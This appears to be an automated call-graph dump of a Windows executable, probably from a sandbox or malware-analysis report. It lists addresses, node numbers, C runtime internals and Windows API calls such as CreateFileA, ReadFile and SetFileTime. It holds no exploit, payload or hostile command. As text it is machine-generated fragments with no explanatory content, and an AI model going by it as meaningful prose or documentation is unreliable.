25899 7ff7191f3ffc 25891->25899 25897 7ff7191eb489 25892->25897 25902 7ff7191f3790 38 API calls 3 library calls 25892->25902 25894 7ff7191eb4ea 25894->25897 25903 7ff7191f3790 38 API calls 3 library calls 25894->25903 25896 7ff7191eb50b 25896->25897 25904 7ff7191f3790 38 API calls 3 library calls 25896->25904 25897->25891 25905 7ff7191dc854 13 API calls _set_errno_from_matherr 25897->25905 25907 7ff7191f38bc 25899->25907 25902->25894 25903->25896 25904->25897 25905->25889 25906->25891 25908 7ff7191f38d3 25907->25908 25909 7ff7191f38f1 25907->25909 25929 7ff7191dc854 13 API calls _set_errno_from_matherr 25908->25929 25909->25908 25912 7ff7191f390d 25909->25912 25911 7ff7191f38d8 25930 7ff7191da5d8 30 API calls _invalid_parameter_noinfo_noreturn 25911->25930 25918 7ff7191f3ee4 25912->25918 25916 7ff7191f38e4 25916->25879 25932 7ff7191d86f4 25918->25932 25923 7ff7191f3f47 25940 7ff7191dc624 25923->25940 25925 7ff7191f3f9f 25927 7ff7191f3938 25925->25927 26006 7ff7191e6b28 25925->26006 25927->25916 25931 7ff7191eac04 LeaveCriticalSection 25927->25931 25929->25911 25930->25916 25933 7ff7191d8718 25932->25933 25939 7ff7191d8713 25932->25939 25933->25939 26011 7ff7191e5ac4 33 API calls 3 library calls 25933->26011 25935 7ff7191d8733 26012 7ff7191e5d6c 33 API calls __std_fs_code_page 25935->26012 25937 7ff7191d8756 26013 7ff7191e5da0 33 API calls _Toupper 25937->26013 25939->25923 26005 7ff7191e78dc 5 API calls try_get_function 25939->26005 25941 7ff7191dc66f 25940->25941 25942 7ff7191dc64d 25940->25942 25944 7ff7191dc673 25941->25944 25945 7ff7191dc6c8 25941->25945 25943 7ff7191dc65b 25942->25943 25946 7ff7191e6b28 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 25942->25946 25943->25925 25962 7ff7191f4030 25943->25962 25944->25943 25949 7ff7191dc687 25944->25949 25951 7ff7191e6b28 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 25944->25951 26021 7ff7191ea73c MultiByteToWideChar 25945->26021 25946->25943 26014 7ff7191e82bc 25949->26014 25951->25949 26024 7ff7191f3c14 25962->26024 25965 7ff7191f40a5 26055 7ff7191dc834 13 API calls _set_errno_from_matherr 25965->26055 25966 7ff7191f40bd 26043 7ff7191eac2c 25966->26043 25985 7ff7191f40aa 26056 7ff7191dc854 13 API calls _set_errno_from_matherr 25985->26056 25998 7ff7191f40b6 25998->25925 26005->25923 26007 7ff7191e6b5f 26006->26007 26008 7ff7191e6b2d RtlReleasePrivilege 26006->26008 26007->25927 26008->26007 26009 7ff7191e6b48 26008->26009 26076 7ff7191dc854 13 API calls _set_errno_from_matherr 26009->26076 26011->25935 26012->25937 26013->25939 26015 7ff7191e8307 26014->26015 26019 7ff7191e82cb _set_errno_from_matherr 26014->26019 26023 7ff7191dc854 13 API calls _set_errno_from_matherr 26015->26023 26016 7ff7191e82ee RtlAllocateHeap 26018 7ff7191e8305 26016->26018 26016->26019 26018->25943 26019->26015 26019->26016 26022 7ff7191e1868 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 26019->26022 26022->26019 26023->26018 26025 7ff7191f3c40 26024->26025 26033 7ff7191f3c5a 26024->26033 26025->26033 26068 7ff7191dc854 13 API calls _set_errno_from_matherr 26025->26068 26027 7ff7191f3c4f 26069 7ff7191da5d8 30 API calls _invalid_parameter_noinfo_noreturn 26027->26069 26029 7ff7191f3d2e 26041 7ff7191f3d8a 26029->26041 26074 7ff7191e2b1c 30 API calls 2 library calls 26029->26074 26030 7ff7191f3cda 26030->26029 26072 7ff7191dc854 13 API calls _set_errno_from_matherr 26030->26072 26033->26030 26070 7ff7191dc854 13 API calls _set_errno_from_matherr 26033->26070 26034 7ff7191f3d86 26039 7ff7191da628 _invalid_parameter_noinfo_noreturn 17 API calls 26034->26039 26034->26041 26035 7ff7191f3d23 26073 7ff7191da5d8 30 API calls _invalid_parameter_noinfo_noreturn 26035->26073 26038 7ff7191f3ccf 26071 7ff7191da5d8 30 API calls _invalid_parameter_noinfo_noreturn 26038->26071 26042 7ff7191f3e1d 26039->26042 26041->25965 26041->25966 26075 7ff7191de128 EnterCriticalSection 26043->26075 26055->25985 26056->25998 26068->26027 26069->26033 26070->26038 26071->26030 26072->26035 26073->26029 26074->26034 26076->26007 26077 7ff7191c4270 26078 7ff7191c42be 26077->26078 26079 7ff7191c42ae 26077->26079 26186 7ff7191bfec0 32 API calls 4 library calls 26078->26186 26081 7ff7191b9e00 69 API calls 26079->26081 26083 7ff7191c42b7 26081->26083 26082 7ff7191c42d1 26084 7ff7191bab00 32 API calls 26082->26084 26085 7ff7191b9e00 69 API calls 26083->26085 26084->26083 26086 7ff7191c4330 26085->26086 26088 7ff7191c4502 26086->26088 26092 7ff7191c4508 26086->26092 26109 7ff7191c44fc 26086->26109 26127 7ff7191c67a0 26086->26127 26090 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26088->26090 26089 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26089->26088 26090->26092 26093 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26092->26093 26095 7ff7191c450e 26093->26095 26188 7ff7191c0de0 26095->26188 26096 7ff7191c44d2 26099 7ff7191d23b0 _handle_error 8 API calls 26096->26099 26097 7ff7191c4447 26113 7ff7191c4452 26097->26113 26153 7ff7191c45b0 26097->26153 26103 7ff7191c44e9 26099->26103 26100 7ff7191c44f7 26106 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26100->26106 26106->26109 26109->26089 26110 7ff7191c4496 26110->26096 26110->26100 26113->26095 26187 7ff7191bd800 30 API calls _invalid_parameter_noinfo_noreturn 26113->26187 26114 7ff7191c453a 26115 7ff7191bfc00 65 API calls 26114->26115 26116 7ff7191c4549 26115->26116 26205 7ff7191bfbe0 65 API calls _com_raise_error 26116->26205 26118 7ff7191c4558 26119 7ff7191bfc00 65 API calls 26118->26119 26120 7ff7191c4567 26119->26120 26206 7ff7191c51d0 32 API calls 26120->26206 26122 7ff7191c4575 26207 7ff7191c1330 26122->26207 26126 7ff7191c459a 26130 7ff7191c67cf 26127->26130 26132 7ff7191c67f5 26127->26132 26128 7ff7191d23b0 _handle_error 8 API calls 26129 7ff7191c4434 26128->26129 26129->26110 26135 7ff7191c3230 26129->26135 26130->26132 26215 7ff7191c5750 26130->26215 26132->26128 26133 7ff7191c68ec 26133->26132 26134 7ff7191c5750 2 API calls 26133->26134 26134->26133 26136 7ff7191c3274 memcpy_s 26135->26136 26243 7ff7191c64b0 26136->26243 26138 7ff7191c1330 30 API calls 26140 7ff7191c3396 26138->26140 26142 7ff7191d41cc _com_raise_error 2 API calls 26140->26142 26141 7ff7191ba9a0 32 API calls 26143 7ff7191c32dd 26141->26143 26144 7ff7191c33a6 26142->26144 26246 7ff7191c1070 26143->26246 26144->26097 26147 7ff7191c3356 26148 7ff7191d23b0 _handle_error 8 API calls 26147->26148 26150 7ff7191c336d 26148->26150 26149 7ff7191c3380 26151 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26149->26151 26150->26097 26152 7ff7191c3385 26151->26152 26152->26138 26352 7ff7191c8770 26153->26352 26158 7ff7191c4637 26364 7ff7191c0b80 26158->26364 26159 7ff7191c47cf 26162 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26159->26162 26161 7ff7191c4665 26163 7ff7191c467a 26161->26163 26164 7ff7191c4737 26161->26164 26165 7ff7191c47d4 26162->26165 26378 7ff7191c47e0 26163->26378 26166 7ff7191c3130 69 API calls 26164->26166 26168 7ff7191c4741 26166->26168 26419 7ff7191b9470 26168->26419 26173 7ff7191c4774 26176 7ff7191d23b0 _handle_error 8 API calls 26173->26176 26175 7ff7191c46d9 GetFileTime DosDateTimeToFileTime LocalFileTimeToFileTime SetFileTime CloseHandle 26175->26168 26177 7ff7191c446c 26176->26177 26177->26113 26178 7ff7191c6350 26177->26178 26181 7ff7191c637c 26178->26181 26182 7ff7191c63b7 __std_exception_copy 26178->26182 26179 7ff7191d23b0 _handle_error 8 API calls 26180 7ff7191c63cc 26179->26180 26180->26113 26181->26182 26183 7ff7191c63f1 __std_exception_copy 26181->26183 26785 7ff7191c9bc0 8 API calls 26181->26785 26182->26179 26183->26182 26778 7ff7191cf0a0 26183->26778 26186->26082 26187->26110 26189 7ff7191c0df9 26188->26189 26190 7ff7191bafd0 73 API calls 26189->26190 26191 7ff7191c0e7d 26190->26191 26192 7ff7191bae10 38 API calls 26191->26192 26193 7ff7191c0ef8 26192->26193 26194 7ff7191bfc00 26193->26194 26195 7ff7191bfc30 26194->26195 26196 7ff7191baea0 65 API calls 26195->26196 26197 7ff7191bfc80 26195->26197 26196->26197 26198 7ff7191bfe29 26197->26198 26201 7ff7191bfe67 26197->26201 26200 7ff7191bfe3a 26198->26200 26786 7ff7191baf80 32 API calls 26198->26786 26204 7ff7191c16d0 95 API calls _com_raise_error 26200->26204 26202 7ff7191d41cc _com_raise_error 2 API calls 26201->26202 26203 7ff7191bfeba 26202->26203 26204->26114 26205->26118 26206->26122 26208 7ff7191d3f88 __std_exception_copy 30 API calls 26207->26208 26209 7ff7191c1364 26208->26209 26210 7ff7191d41cc 26209->26210 26211 7ff7191d41eb 26210->26211 26212 7ff7191d4208 RtlPcToFileHeader 26210->26212 26211->26212 26213 7ff7191d422f _purecall 26212->26213 26214 7ff7191d4220 26212->26214 26213->26126 26214->26213 26216 7ff7191c5795 26215->26216 26217 7ff7191c5784 26215->26217 26218 7ff7191c5ef0 2 API calls 26216->26218 26219 7ff7191c57c8 26216->26219 26217->26133 26218->26219 26234 7ff7191c5ef0 26219->26234 26222 7ff7191c5ef0 2 API calls 26223 7ff7191c5905 26222->26223 26224 7ff7191c5ef0 2 API calls 26223->26224 26225 7ff7191c591b 26224->26225 26226 7ff7191c5ef0 2 API calls 26225->26226 26227 7ff7191c593a 26226->26227 26228 7ff7191c5ef0 2 API calls 26227->26228 26229 7ff7191c59c4 26228->26229 26230 7ff7191c5ef0 2 API calls 26229->26230 26233 7ff7191c59da 26230->26233 26231 7ff7191c5daf 26231->26133 26232 7ff7191c5ef0 2 API calls 26232->26233 26233->26231 26233->26232 26237 7ff7191c84d0 26234->26237 26235 7ff7191c585f 26235->26222 26238 7ff7191c852e 26237->26238 26239 7ff7191c84ee 26237->26239 26238->26235 26239->26238 26240 7ff7191c84f6 ReadFile 26239->26240 26241 7ff7191c851f 26240->26241 26242 7ff7191c8510 GetLastError 26240->26242 26241->26235 26242->26241 26244 7ff7191c5750 2 API calls 26243->26244 26245 7ff7191c32a0 26244->26245 26245->26141 26245->26152 26247 7ff7191b9e00 69 API calls 26246->26247 26248 7ff7191c10de 26247->26248 26249 7ff7191c0de0 73 API calls 26248->26249 26250 7ff7191c1117 26249->26250 26283 7ff7191c18e0 26250->26283 26253 7ff7191bfc00 65 API calls 26254 7ff7191c1134 26253->26254 26255 7ff7191c18e0 95 API calls 26254->26255 26256 7ff7191c113f 26255->26256 26257 7ff7191bfc00 65 API calls 26256->26257 26258 7ff7191c114e 26257->26258 26259 7ff7191c18e0 95 API calls 26258->26259 26260 7ff7191c1159 26259->26260 26261 7ff7191bfc00 65 API calls 26260->26261 26262 7ff7191c1168 26261->26262 26263 7ff7191c18e0 95 API calls 26262->26263 26264 7ff7191c1176 26263->26264 26265 7ff7191bfc00 65 API calls 26264->26265 26266 7ff7191c1185 26265->26266 26267 7ff7191c18e0 95 API calls 26266->26267 26268 7ff7191c1193 26267->26268 26269 7ff7191bfc00 65 API calls 26268->26269 26270 7ff7191c11a2 26269->26270 26271 7ff7191c18e0 95 API calls 26270->26271 26272 7ff7191c11b0 26271->26272 26273 7ff7191ba9a0 32 API calls 26272->26273 26274 7ff7191c1243 26272->26274 26273->26274 26276 7ff7191c1282 26274->26276 26277 7ff7191c132a 26274->26277 26295 7ff7191c1b90 26276->26295 26279 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26277->26279 26278 7ff7191c12ff 26280 7ff7191d23b0 _handle_error 8 API calls 26278->26280 26281 7ff7191c132f 26279->26281 26282 7ff7191c130f 26280->26282 26282->26147 26282->26149 26284 7ff7191c1923 26283->26284 26286 7ff7191c1937 26284->26286 26298 7ff7191baea0 26284->26298 26291 7ff7191c1994 26286->26291 26308 7ff7191c0960 66 API calls 4 library calls 26286->26308 26288 7ff7191c1125 26288->26253 26289 7ff7191c1a4e 26289->26288 26309 7ff7191baf80 32 API calls 26289->26309 26291->26289 26292 7ff7191c1a93 26291->26292 26293 7ff7191d41cc _com_raise_error 2 API calls 26292->26293 26294 7ff7191c1ae6 26293->26294 26344 7ff7191c1470 26295->26344 26297 7ff7191c1bdc 26297->26278 26299 7ff7191baec2 26298->26299 26303 7ff7191baf4a 26298->26303 26300 7ff7191baea0 65 API calls 26299->26300 26301 7ff7191baedf 26299->26301 26300->26301 26306 7ff7191baf38 26301->26306 26310 7ff7191b8950 26301->26310 26303->26286 26306->26303 26323 7ff7191baf80 32 API calls 26306->26323 26308->26291 26309->26288 26311 7ff7191b8963 26310->26311 26313 7ff7191b897f 26310->26313 26311->26313 26324 7ff7191d8c28 26311->26324 26313->26306 26314 7ff7191b2b00 26313->26314 26315 7ff7191b2b0f 26314->26315 26316 7ff7191b2b16 26314->26316 26317 7ff7191d41cc _com_raise_error 2 API calls 26315->26317 26318 7ff7191b2b24 26315->26318 26316->26306 26317->26318 26319 7ff7191d41cc _com_raise_error 2 API calls 26318->26319 26320 7ff7191b2b7d 26319->26320 26339 7ff7191d3f88 26320->26339 26322 7ff7191b2bbd 26322->26306 26323->26303 26325 7ff7191d8c36 26324->26325 26326 7ff7191d8c3d 26324->26326 26337 7ff7191d8af8 63 API calls 26325->26337 26328 7ff7191d8c3b 26326->26328 26330 7ff7191d8ab8 26326->26330 26328->26313 26338 7ff7191d9764 EnterCriticalSection 26330->26338 26332 7ff7191d8ad5 26333 7ff7191d8bd4 63 API calls 26332->26333 26334 7ff7191d8ae1 26333->26334 26335 7ff7191d9770 _fread_nolock LeaveCriticalSection 26334->26335 26336 7ff7191d8aeb 26335->26336 26336->26328 26337->26328 26340 7ff7191d3fa9 26339->26340 26341 7ff7191d3fde __std_exception_copy 26339->26341 26340->26341 26343 7ff7191e4464 30 API calls 2 library calls 26340->26343 26341->26322 26343->26341 26345 7ff7191c1489 26344->26345 26346 7ff7191c14db 26344->26346 26345->26346 26347 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26345->26347 26346->26297 26349 7ff7191c1567 26347->26349 26348 7ff7191c15a6 26348->26297 26349->26348 26350 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26349->26350 26351 7ff7191c15c6 26350->26351 26423 7ff7191c8ca0 26352->26423 26355 7ff7191c86e0 26457 7ff7191c8870 26355->26457 26358 7ff7191c874f 26359 7ff7191d23b0 _handle_error 8 API calls 26358->26359 26361 7ff7191c45fa 26359->26361 26360 7ff7191c876a 26362 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26360->26362 26361->26158 26361->26159 26363 7ff7191c876f 26362->26363 26365 7ff7191c0bbb 26364->26365 26619 7ff7191bafd0 26365->26619 26369 7ff7191c0c61 26370 7ff7191c0ce0 26369->26370 26375 7ff7191c0d5d 26369->26375 26635 7ff7191ba630 30 API calls _handle_error 26370->26635 26372 7ff7191c0cf1 26636 7ff7191bbde0 66 API calls 5 library calls 26372->26636 26374 7ff7191c0d12 26374->26161 26375->26374 26376 7ff7191d41cc _com_raise_error 2 API calls 26375->26376 26377 7ff7191c0dd8 26376->26377 26379 7ff7191c4818 26378->26379 26684 7ff7191c7270 26379->26684 26382 7ff7191c4905 26383 7ff7191c0de0 73 API calls 26382->26383 26385 7ff7191c4915 26383->26385 26386 7ff7191bfc00 65 API calls 26385->26386 26388 7ff7191c4927 26386->26388 26717 7ff7191c16d0 95 API calls _com_raise_error 26388->26717 26390 7ff7191c4853 26391 7ff7191c4895 26390->26391 26701 7ff7191c7c20 26390->26701 26705 7ff7191c5300 26390->26705 26393 7ff7191baea0 65 API calls 26391->26393 26395 7ff7191c48a2 26393->26395 26394 7ff7191c4931 26396 7ff7191bfc00 65 API calls 26394->26396 26397 7ff7191c48d6 26395->26397 26401 7ff7191c4900 26395->26401 26398 7ff7191c4940 26396->26398 26400 7ff7191d23b0 _handle_error 8 API calls 26397->26400 26718 7ff7191bfbe0 65 API calls _com_raise_error 26398->26718 26403 7ff7191c468a 26400->26403 26404 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26401->26404 26402 7ff7191c494b 26405 7ff7191bfc00 65 API calls 26402->26405 26413 7ff7191c3130 26403->26413 26404->26382 26406 7ff7191c495a 26405->26406 26719 7ff7191c51d0 32 API calls 26406->26719 26408 7ff7191c496c 26409 7ff7191c1330 30 API calls 26408->26409 26410 7ff7191c4982 26409->26410 26411 7ff7191d41cc _com_raise_error 2 API calls 26410->26411 26412 7ff7191c4993 26411->26412 26770 7ff7191ba730 26413->26770 26415 7ff7191c3170 CreateFileA 26415->26168 26415->26175 26416 7ff7191c3142 26416->26415 26417 7ff7191d41cc _com_raise_error 2 API calls 26416->26417 26418 7ff7191c31c7 26417->26418 26420 7ff7191b948d 26419->26420 26421 7ff7191ba730 67 API calls 26420->26421 26422 7ff7191b94ca 26420->26422 26421->26422 26422->26173 26424 7ff7191c8ccb 26423->26424 26430 7ff7191c8cd8 26423->26430 26426 7ff7191b9e00 69 API calls 26424->26426 26425 7ff7191c907e 26456 7ff7191b1300 32 API calls __std_exception_copy 26425->26456 26428 7ff7191c8cd0 26426->26428 26433 7ff7191d23b0 _handle_error 8 API calls 26428->26433 26429 7ff7191c8d6f 26436 7ff7191c9078 26429->26436 26437 7ff7191d23d8 std::_Facet_Register 32 API calls 26429->26437 26430->26425 26430->26429 26432 7ff7191c8db7 26430->26432 26435 7ff7191c8da0 ctype 26430->26435 26431 7ff7191c9084 26432->26435 26440 7ff7191d23d8 std::_Facet_Register 32 API calls 26432->26440 26434 7ff7191c45f1 26433->26434 26434->26355 26441 7ff7191c9073 26435->26441 26453 7ff7191c8790 8 API calls 2 library calls 26435->26453 26455 7ff7191b1260 32 API calls 3 library calls 26436->26455 26437->26435 26440->26435 26442 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26441->26442 26442->26436 26443 7ff7191c8fed 26443->26428 26445 7ff7191ba9a0 32 API calls 26443->26445 26444 7ff7191c8e3a 26444->26425 26444->26441 26444->26443 26447 7ff7191c8eea 26444->26447 26448 7ff7191c8f3a 26444->26448 26450 7ff7191c8ef5 ctype 26444->26450 26445->26428 26446 7ff7191d23d8 std::_Facet_Register 32 API calls 26446->26450 26447->26436 26447->26446 26448->26450 26451 7ff7191d23d8 std::_Facet_Register 32 API calls 26448->26451 26450->26441 26454 7ff7191c8790 8 API calls 2 library calls 26450->26454 26451->26450 26452 7ff7191c8fbb 26452->26441 26452->26443 26453->26444 26454->26452 26455->26425 26456->26431 26458 7ff7191c88c9 26457->26458 26465 7ff7191c8928 26457->26465 26491 7ff7191c8c7e 26458->26491 26512 7ff7191bd1b0 32 API calls 4 library calls 26458->26512 26462 7ff7191c8c84 26466 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26462->26466 26463 7ff7191c8997 ctype 26495 7ff7191dcf94 26463->26495 26465->26463 26470 7ff7191c8c90 26465->26470 26513 7ff7191bca80 32 API calls 4 library calls 26465->26513 26468 7ff7191c8c8a 26466->26468 26473 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26468->26473 26469 7ff7191c8a17 26472 7ff7191c8a4c 26469->26472 26484 7ff7191c8a1b 26469->26484 26515 7ff7191c9090 54 API calls _handle_error 26469->26515 26471 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26470->26471 26475 7ff7191c8c96 26471->26475 26472->26484 26517 7ff7191c90f0 69 API calls 6 library calls 26472->26517 26473->26470 26478 7ff7191c8a31 26478->26484 26516 7ff7191dd174 38 API calls 26478->26516 26479 7ff7191c8a64 26479->26462 26481 7ff7191c8ca0 69 API calls 26479->26481 26487 7ff7191c8b21 26481->26487 26482 7ff7191c8c4d 26483 7ff7191d23b0 _handle_error 8 API calls 26482->26483 26486 7ff7191c8718 26483->26486 26484->26470 26484->26482 26485 7ff7191c8c79 26484->26485 26488 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26485->26488 26486->26358 26486->26360 26490 7ff7191dcf94 54 API calls 26487->26490 26494 7ff7191c8b7c 26487->26494 26488->26491 26492 7ff7191c8b44 26490->26492 26519 7ff7191b1300 32 API calls __std_exception_copy 26491->26519 26493 7ff7191c8870 93 API calls 26492->26493 26492->26494 26493->26494 26494->26468 26518 7ff7191dd094 38 API calls 2 library calls 26494->26518 26496 7ff7191dcfb1 26495->26496 26497 7ff7191dcfbd 26495->26497 26498 7ff7191dc874 51 API calls 26496->26498 26499 7ff7191d86f4 _Toupper 33 API calls 26497->26499 26500 7ff7191c89ee 26498->26500 26501 7ff7191dcfe5 26499->26501 26500->26469 26514 7ff7191dd174 38 API calls 26500->26514 26503 7ff7191dcff5 26501->26503 26544 7ff7191e78dc 5 API calls try_get_function 26501->26544 26504 7ff7191dc624 16 API calls 26503->26504 26505 7ff7191dd049 26504->26505 26506 7ff7191dd061 26505->26506 26507 7ff7191dd04d 26505->26507 26520 7ff7191dc874 26506->26520 26507->26500 26510 7ff7191e6b28 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 26507->26510 26510->26500 26511 7ff7191e6b28 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 26511->26500 26512->26465 26513->26463 26514->26469 26515->26478 26516->26472 26517->26479 26518->26484 26519->26462 26521 7ff7191dc89a 26520->26521 26522 7ff7191dc8b9 memcpy_s 26520->26522 26571 7ff7191dc834 13 API calls _set_errno_from_matherr 26521->26571 26522->26521 26526 7ff7191dc8e9 CreateFileW 26522->26526 26524 7ff7191dc89f 26572 7ff7191dc854 13 API calls _set_errno_from_matherr 26524->26572 26528 7ff7191dc982 26526->26528 26529 7ff7191dc91e 26526->26529 26527 7ff7191dc8a6 26573 7ff7191da5d8 30 API calls _invalid_parameter_noinfo_noreturn 26527->26573 26574 7ff7191dce90 39 API calls 4 library calls 26528->26574 26545 7ff7191dca08 GetFileType 26529->26545 26533 7ff7191dc8b1 26533->26500 26533->26511 26534 7ff7191dc987 26536 7ff7191dc98b 26534->26536 26537 7ff7191dc997 26534->26537 26535 7ff7191dc92c memcpy_s 26535->26533 26538 7ff7191dc95e CloseHandle 26535->26538 26575 7ff7191dc7e4 13 API calls 2 library calls 26536->26575 26576 7ff7191dcc48 26537->26576 26538->26533 26543 7ff7191dc995 26543->26535 26544->26503 26546 7ff7191dca56 26545->26546 26547 7ff7191dcb0e 26545->26547 26550 7ff7191dca70 memcpy_s 26546->26550 26594 7ff7191dcd80 23 API calls _fread_nolock 26546->26594 26548 7ff7191dcb16 26547->26548 26549 7ff7191dcb38 26547->26549 26551 7ff7191dcb1a 26548->26551 26552 7ff7191dcb29 GetLastError 26548->26552 26553 7ff7191dcb5b PeekNamedPipe 26549->26553 26559 7ff7191dcaf9 26549->26559 26555 7ff7191dca91 GetFileInformationByHandle 26550->26555 26550->26559 26596 7ff7191dc854 13 API calls _set_errno_from_matherr 26551->26596 26597 7ff7191dc7e4 13 API calls 2 library calls 26552->26597 26553->26559 26555->26552 26558 7ff7191dcaa6 26555->26558 26562 7ff7191dcc48 34 API calls 26558->26562 26560 7ff7191d23b0 _handle_error 8 API calls 26559->26560 26561 7ff7191dcb94 26560->26561 26561->26535 26563 7ff7191dcab1 26562->26563 26587 7ff7191dcbac 26563->26587 26566 7ff7191dcbac 10 API calls 26567 7ff7191dcad0 26566->26567 26568 7ff7191dcbac 10 API calls 26567->26568 26569 7ff7191dcae1 26568->26569 26569->26559 26595 7ff7191dc854 13 API calls _set_errno_from_matherr 26569->26595 26571->26524 26572->26527 26573->26533 26574->26534 26575->26543 26578 7ff7191dcc70 26576->26578 26577 7ff7191dc9a4 26586 7ff7191dcd80 23 API calls _fread_nolock 26577->26586 26578->26577 26598 7ff7191d87a4 26578->26598 26580 7ff7191dcd01 26580->26577 26581 7ff7191d87a4 TranslateName 34 API calls 26580->26581 26582 7ff7191dcd14 26581->26582 26582->26577 26583 7ff7191d87a4 TranslateName 34 API calls 26582->26583 26584 7ff7191dcd27 26583->26584 26584->26577 26585 7ff7191d87a4 TranslateName 34 API calls 26584->26585 26585->26577 26586->26543 26588 7ff7191dcbd2 26587->26588 26589 7ff7191dcbdb FileTimeToSystemTime 26587->26589 26588->26589 26591 7ff7191dcbd6 26588->26591 26590 7ff7191dcbed SystemTimeToTzSpecificLocalTime 26589->26590 26589->26591 26590->26591 26592 7ff7191d23b0 _handle_error 8 API calls 26591->26592 26593 7ff7191dcac0 26592->26593 26593->26566 26594->26550 26595->26559 26596->26559 26597->26559 26599 7ff7191d87b4 26598->26599 26600 7ff7191d882f 26598->26600 26603 7ff7191d87d8 26599->26603 26615 7ff7191dc854 13 API calls _set_errno_from_matherr 26599->26615 26601 7ff7191d86f4 _Toupper 33 API calls 26600->26601 26604 7ff7191d8862 26601->26604 26603->26580 26606 7ff7191d886e 26604->26606 26612 7ff7191d8888 26604->26612 26605 7ff7191d87be 26616 7ff7191da5d8 30 API calls _invalid_parameter_noinfo_noreturn 26605->26616 26617 7ff7191dc854 13 API calls _set_errno_from_matherr 26606->26617 26609 7ff7191d87c9 26609->26580 26610 7ff7191d8873 26618 7ff7191da5d8 30 API calls _invalid_parameter_noinfo_noreturn 26610->26618 26613 7ff7191e5688 34 API calls TranslateName 26612->26613 26614 7ff7191d887e 26612->26614 26613->26612 26614->26580 26615->26605 26616->26609 26617->26610 26618->26614 26620 7ff7191d23d8 std::_Facet_Register 32 API calls 26619->26620 26621 7ff7191bb02b 26620->26621 26637 7ff7191d1144 26621->26637 26626 7ff7191bb0b4 26628 7ff7191bb0c1 26626->26628 26659 7ff7191d141c 7 API calls 2 library calls 26626->26659 26627 7ff7191b2b00 32 API calls 26627->26626 26630 7ff7191bae10 26628->26630 26631 7ff7191d23d8 std::_Facet_Register 32 API calls 26630->26631 26632 7ff7191bae31 26631->26632 26633 7ff7191d1144 38 API calls 26632->26633 26634 7ff7191bae41 26633->26634 26634->26369 26635->26372 26636->26374 26660 7ff7191d0d0c 26637->26660 26639 7ff7191d1166 26645 7ff7191d1189 __std_exception_copy ctype 26639->26645 26664 7ff7191d1340 26639->26664 26641 7ff7191d117e 26667 7ff7191d1370 26641->26667 26644 7ff7191bb03b 26646 7ff7191bb100 26644->26646 26671 7ff7191d0d84 26645->26671 26647 7ff7191d0d0c std::_Lockit::_Lockit 6 API calls 26646->26647 26648 7ff7191bb132 26647->26648 26649 7ff7191bb200 26648->26649 26682 7ff7191b2110 72 API calls 8 library calls 26648->26682 26650 7ff7191d0d84 std::_Lockit::~_Lockit LeaveCriticalSection 26649->26650 26652 7ff7191bb20a 26650->26652 26654 7ff7191d23b0 _handle_error 8 API calls 26652->26654 26653 7ff7191bb1d8 26653->26649 26656 7ff7191bb22f 26653->26656 26655 7ff7191bb065 26654->26655 26655->26626 26655->26627 26683 7ff7191b1a20 32 API calls 3 library calls 26656->26683 26658 7ff7191bb234 26659->26628 26661 7ff7191d0d1b 26660->26661 26663 7ff7191d0d20 26660->26663 26675 7ff7191de198 6 API calls std::_Lockit::_Lockit 26661->26675 26663->26639 26665 7ff7191d23d8 std::_Facet_Register 32 API calls 26664->26665 26666 7ff7191d1352 26665->26666 26666->26641 26668 7ff7191d1395 26667->26668 26669 7ff7191d1382 26667->26669 26668->26645 26676 7ff7191d1ca8 26669->26676 26672 7ff7191d0d8f LeaveCriticalSection 26671->26672 26673 7ff7191d0d98 26671->26673 26673->26644 26677 7ff7191d1cb6 RtlEncodePointer 26676->26677 26678 7ff7191d1cdd 26676->26678 26677->26668 26681 7ff7191e1188 33 API calls BuildCatchObjectHelperInternal 26678->26681 26682->26653 26683->26658 26720 7ff7191c6b30 26684->26720 26687 7ff7191c0720 26688 7ff7191c0749 26687->26688 26698 7ff7191c0856 26687->26698 26690 7ff7191c0768 26688->26690 26691 7ff7191c07c0 26688->26691 26692 7ff7191c085c 26690->26692 26693 7ff7191d23d8 std::_Facet_Register 32 API calls 26690->26693 26694 7ff7191d23d8 std::_Facet_Register 32 API calls 26691->26694 26700 7ff7191c077c memcpy_s ctype 26691->26700 26745 7ff7191b1260 32 API calls 3 library calls 26692->26745 26693->26700 26694->26700 26696 7ff7191c0862 26697 7ff7191da5f8 _invalid_parameter_noinfo_noreturn 30 API calls 26697->26698 26744 7ff7191bd190 32 API calls 26698->26744 26699 7ff7191c082a 26699->26390 26700->26697 26700->26699 26702 7ff7191c7c51 26701->26702 26703 7ff7191c7c3c ctype 26701->26703 26702->26390 26703->26702 26704 7ff7191c84d0 2 API calls 26703->26704 26704->26703 26706 7ff7191c5345 26705->26706 26708 7ff7191baea0 65 API calls 26706->26708 26709 7ff7191c5359 26706->26709 26707 7ff7191c538c 26711 7ff7191c53fd 26707->26711 26713 7ff7191c5440 26707->26713 26708->26709 26709->26707 26746 7ff7191b8bf0 26709->26746 26710 7ff7191c540e 26710->26390 26711->26710 26750 7ff7191baf80 32 API calls 26711->26750 26714 7ff7191d41cc _com_raise_error 2 API calls 26713->26714 26715 7ff7191c5493 26714->26715 26717->26394 26718->26402 26719->26408 26721 7ff7191c6b69 26720->26721 26722 7ff7191c7257 26720->26722 26721->26722 26723 7ff7191c6b86 26721->26723 26724 7ff7191c6350 21 API calls 